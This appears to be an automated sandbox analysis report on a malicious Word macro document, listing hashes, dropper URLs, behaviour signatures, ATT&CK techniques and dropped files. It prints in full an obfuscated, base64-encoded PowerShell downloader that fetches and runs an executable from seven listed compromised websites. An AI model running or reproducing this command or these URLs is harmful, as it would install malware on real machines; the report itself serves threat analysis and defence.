0a73805c5e818514004fc8df6d731d2357647c7685234dba6cff3ef8d22f5b07

General

Target

b114281a6664f44018353cae8a6f00cea1d34854e2942f01a9e027d2ab333b9d.doc
Size

170KB
MD5

e76976972a1c472103da35a58f2b7e20
SHA1

13741661f6dd60c885900e9d1f1a8534df9f5cda
SHA256

b114281a6664f44018353cae8a6f00cea1d34854e2942f01a9e027d2ab333b9d
SHA512

e0fb97de3761f8359d757ad99ebfb88242d9dc571516f24247c5c0572e9b5e376554aea65628379b5f271fac539efef57c96c0f9593506497a88f6a2a0435a05
SSDEEP

1536:AGGGGGGGGGG2xJLEt+LaaGGGGGGGGGGjLo9xiP340Vzy7dUWqHe43d9T96aEH5is:yrfrzOH98ipgWPLQSq/1

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://geevida.com/wp-admin/DhWo/

exe.dropper

http://elrofanfoods.com/wp-admin/qc/

exe.dropper

https://volcanict.com/wp-admin/LfWFF/

exe.dropper

http://xmjadever.com/wp-admin/FTOXI/

exe.dropper

https://gbmcleaning.com/1/Gdk5eqv/

exe.dropper

https://kingchuen.com/cgi-bin/KQ/

exe.dropper

https://billc46.com/uf65/H4/

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2192	4284	powershell.exe	83

Blocklisted process makes network request 3 IoCs

flow	pid	Process
23	2192	powershell.exe
31	2192	powershell.exe
36	2192	powershell.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
3464	WINWORD.EXE
3464	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2192	powershell.exe
2192	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2192	powershell.exe

Suspicious use of SetWindowsHookEx 8 IoCs

pid	Process
3464	WINWORD.EXE
3464	WINWORD.EXE
3464	WINWORD.EXE
3464	WINWORD.EXE
3464	WINWORD.EXE
3464	WINWORD.EXE
3464	WINWORD.EXE
3464	WINWORD.EXE

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\b114281a6664f44018353cae8a6f00cea1d34854e2942f01a9e027d2ab333b9d.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:3464

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -encod JABFAF8AOQBqAGEAcwBoAD0AKAAnAEcAJwArACcANwAnACsAKAAnADMAYwB6ADYAJwArACcAOAAnACkAKQA7ACYAKAAnAG4AJwArACcAZQB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUATgBWADoAdQBTAGUAcgBQAFIAbwBmAGkATABFAFwARgBzAFoANQBlADIAVwBcAFoAVgBGADcAaQB6AE8AXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABpAFIARQBDAHQAbwBSAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBjAFUAUgBJAGAAVABZAHAAYABSAG8AYABUAE8AQwBvAGwAIgAgAD0AIAAoACcAdABsACcAKwAoACcAcwAnACsAJwAxADIAJwApACsAKAAnACwAIAAnACsAJwB0ACcAKQArACgAJwBsAHMAJwArACcAMQAxACcAKQArACgAJwAsACAAdABsACcAKwAnAHMAJwApACkAOwAkAE4AMwA3AHAAdQA3AGYAIAA9ACAAKAAnAFcAYQAnACsAKAAnAHEAJwArACcAaQBoAG8AJwApACsAJwBrADcAJwApADsAJABGADUAaABnADYANQA1AD0AKAAoACcAVQBpAHUAMAAnACsAJwA4ACcAKQArACcAZQAxACcAKQA7ACQAUQBmAGgANQAzAGwAMQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAJwB7ADAAfQBGACcAKwAnAHMAJwArACgAJwB6ADUAZQAnACsAJwAyACcAKQArACcAdwB7ADAAfQBaACcAKwAnAHYAZgA3AGkAegBvAHsAJwArACcAMAB9ACcAKQAtAGYAIAAgAFsAQwBoAEEAcgBdADkAMgApACsAJABOADMANwBwAHUANwBmACsAKAAoACcALgBlACcAKwAnAHgAJwApACsAJwBlACcAKQA7ACQAVgB2AGoAMAB0AGsAZgA9ACgAKAAnAE4AYQAnACsAJwBoAGoAZgAnACkAKwAnADcAMwAnACkAOwAkAFoAbwBvAHUAcABpAG0APQAmACgAJwBuAGUAJwArACcAdwAtAG8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAE4AZQBUAC4AVwBlAEIAQwBMAGkARQBuAFQAOwAkAEUAMAA4AGwANgB2AGsAPQAoACgAJwBoAHQAJwArACcAdABwADoAJwApACsAKAAnAC8ALwAnACsAJwBnACcAKQArACcAZQBlACcAKwAoACcAdgAnACsAJwBpAGQAJwApACsAKAAnAGEALgBjAG8AbQAvACcAKwAnAHcAJwApACsAKAAnAHAAJwArACcALQBhAGQAJwApACsAKAAnAG0AaQAnACsAJwBuAC8AJwApACsAKAAnAEQAaAAnACsAJwBXAG8AJwArACcALwAqACcAKQArACgAJwBoAHQAJwArACcAdAAnACkAKwAoACcAcAA6AC8AJwArACcALwBlACcAKQArACcAbAAnACsAKAAnAHIAbwAnACsAJwBmAGEAbgBmAG8AbwBkAHMAJwArACcALgAnACkAKwAoACcAYwBvAG0ALwAnACsAJwB3ACcAKQArACgAJwBwACcAKwAnAC0AYQAnACkAKwAoACcAZAAnACsAJwBtACcAKwAnAGkAbgAvAHEAYwAnACkAKwAnAC8AJwArACcAKgBoACcAKwAnAHQAJwArACcAdAAnACsAKAAnAHAAcwA6AC8ALwAnACsAJwB2AG8AbABjACcAKQArACgAJwBhACcAKwAnAG4AaQAnACkAKwAoACcAYwB0ACcAKwAnAC4AYwBvACcAKQArACgAJwBtACcAKwAnAC8AJwArACcAdwBwAC0AYQAnACsAJwBkAG0AaQBuAC8AJwArACcATABmAFcARgAnACkAKwAoACcARgAnACsAJwAvACoAaAB0AHQAJwArACcAcAA6AC8ALwB4ACcAKwAnAG0AagBhACcAKwAnAGQAZQB2AGUAcgAnACsAJwAuACcAKQArACgAJwBjACcAKwAnAG8AbQAvAHcAcAAtACcAKwAnAGEAJwArACcAZABtAGkAJwArACcAbgAvAEYAJwApACsAJwBUAE8AJwArACgAJwBYAEkAJwArACcALwAqAGgAdAB0AHAAJwApACsAJwBzACcAKwAnADoAJwArACcALwAnACsAKAAnAC8AJwArACcAZwBiAG0AYwAnACsAJwBsACcAKQArACgAJwBlACcAKwAnAGEAbgAnACkAKwAoACcAaQBuAGcAJwArACcALgBjAG8AJwArACcAbQAnACsAJwAvADEAJwArACcALwBHACcAKwAnAGQAawAnACsAJwA1AGUAcQB2AC8AKgBoACcAKQArACgAJwB0AHQAJwArACcAcABzADoAJwApACsAJwAvACcAKwAnAC8AawAnACsAJwBpAG4AJwArACgAJwBnAGMAaAAnACsAJwB1ACcAKQArACcAZQBuACcAKwAoACcALgBjAG8AbQAvAGMAJwArACcAZwBpAC0AJwApACsAJwBiAGkAJwArACcAbgAvACcAKwAoACcASwAnACsAJwBRAC8AKgAnACkAKwAnAGgAJwArACgAJwB0AHQAcAAnACsAJwBzACcAKQArACgAJwA6ACcAKwAnAC8ALwBiACcAKQArACcAaQAnACsAKAAnAGwAbABjADQANgAnACsAJwAuACcAKwAnAGMAbwBtAC8AJwArACcAdQBmADYAJwApACsAKAAnADUALwAnACsAJwBIADQAJwApACsAJwAvACcAKQAuACIAcwBQAEwAYABJAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABCAHoAMwB6AGEAegBvAD0AKAAnAFkAeQAnACsAKAAnADcAdwAnACsAJwBtACcAKQArACcAeQA5ACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAE0AYQBmAHkAMQA4AGgAIABpAG4AIAAkAEUAMAA4AGwANgB2AGsAKQB7AHQAcgB5AHsAJABaAG8AbwB1AHAAaQBtAC4AIgBkAGAATwB3AE4AYABMAE8AYABBAGQARgBpAGwAZQAiACgAJABNAGEAZgB5ADEAOABoACwAIAAkAFEAZgBoADUAMwBsADEAKQA7ACQAUwA5AG4ANQBhADgAYQA9ACgAKAAnAFIAJwArACcAdAB4ADUAJwApACsAKAAnAHcAJwArACcAdQBpACcAKQApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0AJwArACcASQB0ACcAKwAnAGUAbQAnACkAIAAkAFEAZgBoADUAMwBsADEAKQAuACIAbABgAEUAbgBHAFQAaAAiACAALQBnAGUAIAAzADgAMwA1ADQAKQAgAHsALgAoACcASQBuAHYAbwAnACsAJwBrAGUALQBJACcAKwAnAHQAZQBtACcAKQAoACQAUQBmAGgANQAzAGwAMQApADsAJABXADgAaABtAGEAagBmAD0AKAAoACcARgBhADYAJwArACcAbwB0AGwAJwApACsAJwA3ACcAKQA7AGIAcgBlAGEAawA7ACQASAB1AGgAdAAwAHoAZgA9ACgAKAAnAFYAJwArACcAYQBzAGIAJwApACsAJwB1AHEAJwArACcAbwAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFoAZwByADIAMgB2AHoAPQAoACgAJwBGACcAKwAnAHgAJwArACcANAA4AGYAdAAnACkAKwAnAGcAJwApAA==
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2192

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\TCDDA0D.tmp\sist02.xsl

Filesize
245KB

MD5
f883b260a8d67082ea895c14bf56dd56

SHA1
7954565c1f243d46ad3b1e2f1baf3281451fc14b

SHA256
ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353

SHA512
d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_05ttk3wx.31x.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

Filesize
1KB

MD5
3f704250c787ec2390e36dfb07df2acc

SHA1
9eae3a18e6cdae002010e0bce4cf13436a7ca8b1

SHA256
25f7d7bf9e7c8020509a2adbb45eeb7a79a73aaa4b4c089b4d5bb82e15bd6310

SHA512
22e97cd5f463722830371c3162acb64d445c58a82feb816e6d635a5e2dcf258a000929c360d1aeeb06a33ff64f233be704bca3a65cb047121cc7c5ba051b9970

Download Submit
memory/2192-76-0x0000020B6F440000-0x0000020B6F462000-memory.dmp

Filesize
136KB

Download
memory/3464-9-0x00007FFC9E1F0000-0x00007FFC9E3E5000-memory.dmp

Filesize
2.0MB

Download
memory/3464-24-0x00007FFC9E1F0000-0x00007FFC9E3E5000-memory.dmp

Filesize
2.0MB

Download
memory/3464-7-0x00007FFC5E270000-0x00007FFC5E280000-memory.dmp

Filesize
64KB

Download
memory/3464-8-0x00007FFC9E1F0000-0x00007FFC9E3E5000-memory.dmp

Filesize
2.0MB

Download
memory/3464-10-0x00007FFC9E1F0000-0x00007FFC9E3E5000-memory.dmp

Filesize
2.0MB

Download
memory/3464-11-0x00007FFC9E1F0000-0x00007FFC9E3E5000-memory.dmp

Filesize
2.0MB

Download
memory/3464-15-0x00007FFC9E1F0000-0x00007FFC9E3E5000-memory.dmp

Filesize
2.0MB

Download
memory/3464-14-0x00007FFC9E1F0000-0x00007FFC9E3E5000-memory.dmp

Filesize
2.0MB

Download
memory/3464-16-0x00007FFC5B910000-0x00007FFC5B920000-memory.dmp

Filesize
64KB

Download
memory/3464-13-0x00007FFC9E1F0000-0x00007FFC9E3E5000-memory.dmp

Filesize
2.0MB

Download
memory/3464-12-0x00007FFC9E1F0000-0x00007FFC9E3E5000-memory.dmp

Filesize
2.0MB

Download
memory/3464-0-0x00007FFC5E270000-0x00007FFC5E280000-memory.dmp

Filesize
64KB

Download
memory/3464-17-0x00007FFC5B910000-0x00007FFC5B920000-memory.dmp

Filesize
64KB

Download
memory/3464-6-0x00007FFC9E1F0000-0x00007FFC9E3E5000-memory.dmp

Filesize
2.0MB

Download
memory/3464-27-0x00007FFC9E1F0000-0x00007FFC9E3E5000-memory.dmp

Filesize
2.0MB

Download
memory/3464-70-0x00007FFC9E1F0000-0x00007FFC9E3E5000-memory.dmp

Filesize
2.0MB

Download
memory/3464-5-0x00007FFC9E1F0000-0x00007FFC9E3E5000-memory.dmp

Filesize
2.0MB

Download
memory/3464-4-0x00007FFC5E270000-0x00007FFC5E280000-memory.dmp

Filesize
64KB

Download
memory/3464-2-0x00007FFC5E270000-0x00007FFC5E280000-memory.dmp

Filesize
64KB

Download
memory/3464-92-0x00007FFC9E1F0000-0x00007FFC9E3E5000-memory.dmp

Filesize
2.0MB

Download
memory/3464-93-0x00007FFC9E28D000-0x00007FFC9E28E000-memory.dmp

Filesize
4KB

Download
memory/3464-94-0x00007FFC9E1F0000-0x00007FFC9E3E5000-memory.dmp

Filesize
2.0MB

Download
memory/3464-95-0x00007FFC9E1F0000-0x00007FFC9E3E5000-memory.dmp

Filesize
2.0MB

Download
memory/3464-98-0x00007FFC9E1F0000-0x00007FFC9E3E5000-memory.dmp

Filesize
2.0MB

Download
memory/3464-3-0x00007FFC5E270000-0x00007FFC5E280000-memory.dmp

Filesize
64KB

Download
memory/3464-104-0x00007FFC9E1F0000-0x00007FFC9E3E5000-memory.dmp

Filesize
2.0MB

Download
memory/3464-108-0x00007FFC9E1F0000-0x00007FFC9E3E5000-memory.dmp

Filesize
2.0MB

Download
memory/3464-1-0x00007FFC9E28D000-0x00007FFC9E28E000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads